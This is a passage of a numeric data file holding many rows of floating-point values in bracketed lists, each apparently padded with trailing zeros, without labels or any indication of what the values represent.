1.87923, 1.01007, 0.789384, 0.503349, 0.548707, 0.615919, 0.395558, -0.697982, -0.267981, -2.10715, 0.0295865, 0.139486, -0.501845, 5.97106, -0.0728299, 0.334278, 0.252699, -0.277681, -0.273976, -0.0213905, 0.580596, -0.841813, -0.0293286, 0.0777785, -1.38661, -2.26683, 0.869926, 0.979455, 0.852165, -0.751046, -1.04523, 0.183031, -0.0672466, 1.70925, -0.0695859, 0.628563, -0.652828, -1.73043, -0.954673, -0.0561551, 0.879025, 0.634687, -1.52376, 0.625199, -0.0810672, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0386614, 0.0300274, -0.0406126, 0.0106733, -0.0154052, 0.0442192, 0.019789, -0.0104466, -0.0295513, -0.000415195, -0.0114132, -0.033954, 0.00967678, 0.0219783, -0.0582937, 0.0227223, 0.0164509, -0.028801, -0.0246728, 0.0300411, 0.0194892, -0.00242723, -0.0388959, -0.0476972, 0.0300196, -0.0141949, -0.00170786, 0.0337114, -0.00534261, -0.0399127, -0.0209442, -0.0418985, 0.0235862, -0.0160574, -0.0107141, 0.00116523, -0.0192918, -0.0132972, 0.0290592, 0.0237985, 0.025187, -0.00845821, -0.0390293, -0.0494291, -0.0308208, -0.0264815, -0.0119143, -0.0404856, 0.00349375, -0.000253465, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0442498, -0.022406, 0.0395571, 0.0281488, 0.0075683, 0.0148697, 0.0382801, -0.0241124, 0.0136336, 0.0269792, 0.0396601, -0.0236657, -0.0239268, 0.0400947, -0.0536841, 0.0164122, -0.0389649, 0.0311577, 0.00923819, -0.0169541, -0.0213906, -0.0342286, -0.0389736, -0.0228373, 0.00149021, -0.046021, -0.0419726, -0.0280963, 0.0271984, -0.0504214, -0.050382, -0.027526, 0.0235949, -0.00305105, 0.0223165, -0.0284985, -0.0536751, 
0.00979007, 0.0400998, -0.0218434, 0.0310683, -0.0094176, 0.0199976, -0.0312057, -0.0154904, -0.0238395, 0.0388896, -0.00914617, -0.0505772, -0.0207484, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0617362, 0.196832, 0.775808, -0.548274, 0.713229, -0.943687, -0.826375, 1.35313, -0.392385, -0.373778, 0.391178, 1.71131, 0.177278, 0.111293, -0.296716, 0.408424, -0.550011, -0.506212, -0.698154, -0.920523, -0.804038, 0.347287, 0.492696, -0.390561, 0.0203369, 1.91853, 1.70492, -2.44196, 0.32648, 2.3785, -0.926582, 0.274002, -0.0613919, -0.175036, -0.387735, 0.0123933, 1.69013, -0.550539, 0.252672, 0.19425, -1.71223, -2.07596, -2.51066, -0.63738, 0.384115, -1.56875, -0.431412, 1.4898, 1.45973, 0.288254, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0694637, 0.234293, -0.0384624, 1.88544, 0.0263936, -0.140758, -0.294075, 0.650119, 0.187138, 1.05286, -0.392044, -0.0288931, 0.293739, -0.00315151, 0.0119241, -0.0580794, -0.175109, 0.153388, -0.237627, 0.218168, 0.107495, -0.0854477, 0.0282669, 0.067632, 0.00419083, 0.168374, 0.0515999, -0.215841, -0.163693, 0.340874, -3.03106, 0.0374973, 0.236892, 2.03238, -1.2932, -0.17107, -0.0947622, 0.108934, 2.77119, 0.0231219, 0.162733, 0.0227226, -0.0355209, 0.191682, -0.00959096, 0.878061, 0.139756, -0.38492, 0.97516, 0.0428244, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0956433, 0.434045, -0.112437, 1.01573, 
0.210701, -0.662638, -1.03677, 1.21557, 0.21533, 0.199962, 0.157218, -0.175469, 0.307791, 0.295498, 0.424079, -0.701214, 0.00620567, -0.0681584, 0.359171, 0.956768, 0.239628, 0.180519, 0.0732215, 0.0870791, -0.0214856, -0.00860337, 0.175838, -1.1067, 0.713413, 1.05371, -1.61344, 0.253375, 1.10626, 1.82714, -2.09182, 0.524782, 0.0983768, 0.600907, 1.90327, -0.0871044, -0.246973, -0.706184, 0.0576315, 0.291424, -0.0198773, 0.940403, 0.322904, -0.902529, 1.04154, 0.479672, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.189924, 0.0260059, -0.267103, 0.770939, -0.907456, -1.08298, -0.132564, -0.0595572, -0.379226, -0.176419, 0.132885, 0.0235959, -0.427154, 0.0412024, -1.24642, 0.69487, -0.186457, 0.787567, 0.301205, 0.487338, 0.198397, -1.17986, 0.409079, -0.166769, 0.00472508, 0.462992, 0.0402926, 0.103018, 0.278331, 0.0787222, 0.747431, -1.4341, -0.0304184, 0.0212685, 0.12661, -0.500546, 0.0765586, 1.74537, -0.112925, -0.0576047, 0.283635, 0.00636282, 1.30834, 0.643967, -0.24999, 0.59964, -0.205021, 0.104004, -0.600384, -0.000155705, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.695974, -0.129607, 0.600306, 0.304015, 0.564409, 1.6221, -0.286626, 0.89651, -0.370437, 0.0783919, -0.156796, 0.0115489, -0.546074, -0.31387, 0.423087, 0.440643, 0.196042, 0.0763858, 1.04211, 0.434497, 1.10865, 1.14416, -0.33845, 0.697608, -0.0430303, -0.160625, 0.175219, -0.219286, 0.138402, -0.532377, 0.491973, 0.280262, -0.0919107, -0.977611, -0.144309, 1.32977, 0.928962, -0.264523, -0.325696, 0.0506461, -0.0671854, 0.92042, 1.52524, -0.0115185, 1.23646, 0.383555, 1.1147, -1.21328, 
-0.233483, 0.260875, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.889581, 0.42773, 0.102021, -0.0690815, -0.50109, 0.0994008, 0.0777038, 0.355447, 0.122223, -0.330119, -0.418854, 0.105862, -0.396614, -0.35208, -1.00883, -0.646376, -0.14375, -5.94317, 6.3626, 0.767676, 1.06944, -0.0252855, -0.545631, 0.382134, -0.0321749, -0.35443, 0.0832172, 0.226229, -3.45264, -0.811095, -0.00266894, -0.437992, 0.298922, -0.260096, -0.064719, -0.421387, 0.264886, 0.188394, -0.536335, -0.0919568, 0.344194, 0.239629, 0.156315, 0.288174, 0.0615565, -0.332355, -0.227838, -0.96906, 0.339535, 0.0669412, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.312797, 0.520245, -0.247811, 0.60606, -0.308867, 0.0390312, 0.385516, 0.228354, 0.333615, -0.607636, -0.725812, -0.511116, -1.2652, 0.0569628, 0.847665, -0.195323, -2.17945, 0.445048, 0.272476, -0.00239627, 0.878727, -0.30221, 0.0928734, -0.0238151, 0.0143469, -0.365801, -0.122928, 0.354199, 0.106878, 1.15028, 0.348079, 0.274576, -0.61538, 0.747706, -0.110295, 0.404983, -0.472655, -0.00626858, -1.05629, -0.332901, -0.336936, 0.302657, 1.45289, 0.861287, 0.241594, -1.39795, -0.689364, 0.171802, -0.612382, 0.270854, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.193564, 1.44523, 0.659922, 1.59422, 1.12143, 0.154426, -0.32065, 1.95374, 1.13126, 0.748786, 0.111294, 1.05834, 0.17786, 0.173992, 0.591047, -0.1564, 1.00194, -0.55098, 
0.421743, 0.474903, 0.232618, 0.767089, -0.087252, -0.0644955, 0.00317547, 0.504545, 0.866105, -0.129073, -0.667322, 2.2109, -0.928405, -0.775013, 0.648402, 1.99629, -2.22688, 0.200229, -0.451636, -1.15499, 2.49395, -0.215081, -0.355066, 0.724267, 1.15448, 0.598434, -0.722057, 0.355473, -0.15744, 0.482168, 1.85246, -0.133023, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.153071, 0.0185324, 0.496609, -0.176242, 0.13252, -0.368707, -0.374178, -0.666281, 0.784158, 0.0972886, -0.0192852, 0.30612, -0.832663, -0.318517, 0.159466, 0.17836, 0.333991, 0.436896, -1.07546, 0.288074, -0.149633, 0.578693, -0.0163636, -0.0300377, -0.00523577, 0.171676, 0.270649, 1.19062, -0.146285, 1.77465, 0.333948, 0.701942, -0.340734, -0.182913, -0.423262, 0.406886, 0.346195, 0.278865, -0.0925859, -1.19779, 0.125343, -0.109969, -0.127216, 0.150708, 0.537367, 0.201625, 0.334242, 0.026659, -0.11661, 0.714312, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.147091, -0.920817, -0.670497, 0.276299, -0.0595598, -1.80043, 0.48221, 1.18207, 0.163645, 1.15554, 0.208565, 0.123033, 0.0145719, 0.483299, -0.370696, 0.116619, -0.202445, -3.19707, 4.6203, -0.380048, 0.0601541, 0.17444, 0.536912, -1.04387, 0.0414812, 0.118798, 0.200287, 0.321081, -0.868847, 0.420665, -0.00396356, 0.496525, 0.265315, 0.55163, 0.137533, -0.0918724, -0.642299, 0.144151, 0.335251, 0.026644, -0.39161, -0.306894, -2.18482, -0.469382, 0.155484, 0.329642, 0.0499698, -2.67322, 1.09758, -0.759099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.52024, -0.252208, 0.610368, 0.869977, -0.105383, -0.588515, -0.366213, 0.30223, 0.101059, -0.278991, -0.307602, 0.0397712, 0.149832, 0.543451, -0.0666054, 0.453521, 0.0148984, -0.455494, 1.27761, 0.0723849, -2.01327, 0.253964, 0.530549, 0.262947, -0.00402599, 0.844994, 0.487316, -1.29872, 0.3786, 1.7897, -0.162888, 1.22249, 1.73516, -0.418335, 0.00139107, -0.2073, 0.21481, -0.580094, -0.444339, -0.524151, -0.0877953, -1.35841, -2.08125, -0.287998, 0.265565, -0.0688904, -0.614191, -0.474938, 0.649689, 0.0298627, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00337957, 0.00358123, -0.0523126, -0.0435683, -0.0121571, 0.0389191, -0.0244973, 0.00833114, -0.00309726, -0.0167869, -0.00753699, -0.0139463, -0.0515684, -0.0134991, -0.0500966, 0.0318874, 0.01181, -0.0374396, -0.00661598, -0.047146, 0.0211228, 0.0419343, -0.0287218, -0.0241813, -0.00216306, -0.0163612, -0.0027264, -0.00233119, -0.0456672, 0.0397102, 0.0369856, -0.04383, -0.0307999, -0.0311257, 0.00459582, -0.0222941, -0.0466089, -0.0410443, 0.00114919, -0.0275192, 0.0201718, 0.0173984, -0.0135623, -0.0421613, 0.0354616, -0.046678, -0.0230274, 0.0185662, -0.00593874, -0.0432285, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0394096, 0.55121, -0.0374195, 2.12755, 0.0327126, -0.0055392, 0.131943, 1.44832, 0.398095, 1.15941, -0.0985198, -0.210324, 0.0354951, 0.0111342, 0.0401923, 0.0671328, -0.0669259, -0.197069, -0.10793, 0.115893, 0.193412, -0.186414, -0.0141833, -0.109271, 
-0.000462505, 0.408058, 0.207189, 0.0120423, -0.0833266, 0.0256778, -3.82905, -0.057105, 1.00422, 2.08877, -1.69096, 0.0373892, 0.0479907, 0.0536657, 2.58227, -0.0178714, -0.126188, -0.046956, -0.0208863, 0.645768, 0.0434935, 0.652171, 0.0188168, 0.134778, 1.72043, -0.0939978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.544524, 0.0611729, -0.100278, -0.416678, 0.0386408, -0.143012, 0.205194, -0.202811, -0.143623, 0.722468, -0.272663, 0.0566484, -0.464974, -0.0557419, -0.935183, -0.487267, 0.0660513, -1.14682, 0.751996, 0.776297, 0.999378, 0.415307, -0.0259069, 0.174351, 0.010856, -0.058101, -0.0898991, -0.21022, -0.649379, -0.443088, 0.0840818, 0.0259013, 0.261792, 0.433581, -0.318584, -0.649173, 0.692869, -0.159344, 0.841141, 0.0955951, -0.289821, -0.250892, -1.68588, 0.152792, 0.314845, 0.503401, -0.0960577, -0.56229, 0.601555, -0.00509082, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0672764, -0.478893, 0.834231, -0.272691, 0.120782, -2.3506, 0.405975, -0.926539, 0.469639, 0.17459, 0.0400554, 0.296408, -0.23935, 1.19698, 0.114479, 0.118828, -0.726833, -0.384486, -0.630676, -0.802355, -1.88252, 1.50989, -0.627703, 0.312084, 0.00842059, -0.747298, 0.242916, -0.417442, -0.0627678, 0.435047, -0.435611, 1.01109, 1.16521, -0.481582, 0.039355, -0.43607, 0.0440735, -0.846213, 0.495375, 0.215144, 0.0238547, -0.201547, -2.21498, -0.303679, 0.63545, -0.230395, 0.704447, 0.817042, 1.36926, 0.0497661, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.92864, -0.0805053, 0.0640302, -0.263019, 0.16609, -1.66211, -0.132093, -1.32705, 0.166086, -0.129865, -0.334594, 0.0661127, 0.633007, 0.0379516, -0.387032, -0.0128015, 1.01307, -0.384665, 0.00750208, 0.483827, -0.0300168, 0.97097, -0.516422, -1.18488e-05, -0.0239806, -0.0991065, -0.451664, -0.508915, 0.086945, -1.37244, -0.0566116, 0.845539, -0.0248938, 0.0752465, 0.283255, 0.0503731, -0.635955, -0.633855, -0.463081, 0.366167, -0.443574, -0.303306, -0.455209, -0.437595, 0.477966, 0.434585, -0.127842, -1.30902, 0.176107, 0.103521, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0876844, -0.0394447, 0.0651309, 1.97424, -0.247538, -0.17824, 0.370758, 0.438517, -0.052765, 0.0938755, -1.62234, 0.372372, 0.652717, -0.338896, 0.685237, -0.0467079, 0.0935516, -0.501777, -0.0820838, 0.179616, 0.103024, 0.0365015, -0.194073, 0.534099, -0.0251719, -0.763432, 0.116582, -0.643583, -0.0173197, 0.690473, -0.685065, -0.240548, 0.416865, 2.45208, -1.0554, 0.306108, 0.125049, 0.21656, 2.45733, -0.0456824, -1.41824, 0.389472, -0.467001, 0.301731, 0.858388, 0.901823, -0.427594, 0.684289, 0.0118938, -0.203476, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.136948, 0.00949599, -0.138863, 0.0145009, 0.0200551, -0.240808, -0.123084, 0.0325245, 0.0788718, 0.0204245, -0.136803, -0.0574912, 0.0101873, 0.0759982, -0.146138, -0.0910074, 0.0573273, -0.065921, 0.147955, 0.0703083, -0.0661596, 0.105562, -0.0755332, -0.0848411, -0.00475373, 0.0660235, 0.078352, -0.0748353, -0.136368, 0.0435885, 
-0.147388, 0.0636972, 0.0917308, 0.00161574, -0.112873, -0.144428, -0.057471, 0.0699405, 0.0593641, -0.169008, -0.0948852, -0.0303798, -0.0645098, 0.0536553, 0.0368449, 0.0618894, 0.0667266, 0.0957317, 0.0667804, -0.116074, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.469926, 0.408884, 0.185463, 0.868883, -0.947657, -8.5792, -3.50731, 1.1403, 0.0518583, 0.313976, 0.431151, 1.84579, 0.244769, -0.017983, -0.112137, 1.09834, 0.479314, -0.432428, 1.70457, -0.68671, -0.269506, -0.330778, -0.658605, -0.224633, 0.0204342, 0.521441, 0.913928, 0.791134, -0.732973, 0.101704, -0.623539, -0.717065, 0.727761, -0.728795, -1.7978, 1.08374, 0.666371, 0.0765811, 0.186647, -0.17136, 0.621338, -0.358866, 0.282117, -0.137108, -0.210127, 0.360947, 0.40046, 0.437648, 0.884444, -1.52199, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.517693, -0.188861, -0.110653, 0.610181, 0.357651, 1.10959, 0.213089, 0.138339, -0.598133, 0.0333181, -0.286477, 0.0409145, -0.89652, 0.563481, 0.105493, -1.18442, -1.16413, 0.442435, -1.35846, 0.599078, -0.0404175, 1.98201, -2.90362, 0.623524, 0.00986964, 0.491189, -0.393, 0.394516, -0.509288, -1.0722, 0.0456513, -0.4905, -0.357225, -0.429378, 0.169915, 0.153339, 0.35338, 0.976487, -0.693323, -0.723389, -0.232865, 0.0909224, 0.522503, -0.499166, -0.439303, -0.179512, 0.507023, 0.446633, 0.0971412, -0.423109, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0], [-0.164987, -0.0833527, 0.242473, 0.850368, -0.47946, 0.582513, 0.982952, 1.07879, 0.726892, 0.529269, -0.418537, -0.780971, 0.365121, 0.717431, 0.265642, -0.0855164, -0.0624654, -0.0433837, -0.474597, 0.263688, 0.0366676, 1.05476, -0.184634, 0.342488, -0.00713987, 0.795176, 1.19533, 0.541726, 0.609728, 0.173506, -2.57625, -1.21161, 1.0144, 1.15735, -1.40846, 0.810331, 0.129969, 0.532479, 2.04186, 0.137569, -0.164729, -0.530415, 0.225923, 0.652957, -0.165551, 0.686438, 0.199711, 0.820853, 1.6985, -0.924089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.396691, -0.0966309, 0.524738, 0.290395, -0.141133, -1.89133, -1.61072, 0.125004, -0.460584, 0.990398, 0.149935, -0.403642, -0.208745, -0.396032, -1.32516, -0.229743, -0.785902, 0.120239, -0.47498, 0.598314, -2.38218, 1.42707, 0.247473, -0.141231, -0.0268979, 0.271052, -0.950764, -0.488094, 0.789393, -0.00625228, -0.123165, 0.110131, -0.170346, 0.473505, -0.0567374, -0.198819, -0.0413459, 0.335743, 0.22965, -0.105583, -0.342492, 0.0980278, -0.732316, 0.0609348, 0.604883, 0.581011, -1.76308, -0.742039, -0.16962, -0.581466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.24508, 0.562699, 0.260105, -0.236235, -0.367931, -0.226799, 0.239146, 0.663539, -0.859104, -0.828027, -0.114967, 0.452936, -0.0238205, 0.482179, 0.825268, 0.161358, -0.0338258, 0.56836, -1.88275, 0.745016, -0.0119559, -1.04783, 1.10075, 0.331847, -0.0344808, 0.238694, 0.0153113, 0.114493, 0.354661, 0.453307, -0.166063, -0.710224, -0.656524, -0.207768, -0.261955, 0.324339, -0.0728687, 0.726105, -0.0455242, -1.26913, -0.632906, 0.417452, 
1.43878, -0.39033, -0.00654117, -1.00863, 0.0509374, 0.646698, -0.159838, -0.231139, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.348713, 0.0989373, 0.176364, 1.00371, 0.217003, 0.244686, 0.057497, 0.56687, -0.348277, 2.12931, 0.262162, -0.51769, -0.112407, -0.309114, 0.119633, 0.283863, 0.379286, 0.0909194, -0.0207329, 0.666918, 0.288551, -0.0461617, -0.156872, 0.043032, -0.023566, 0.368011, 0.0401163, 0.213342, 0.0291498, 0.191933, -0.3804, 0.064906, 0.140289, 1.38621, -0.387508, -0.434461, -0.0981892, -0.613056, 0.617226, 0.171985, -0.266164, 0.0484587, 0.331019, 0.321773, 0.507049, 0.895311, -0.150759, -0.60238, -0.142155, 0.160951, 0.0, 0.0, 0.0, 0.0, 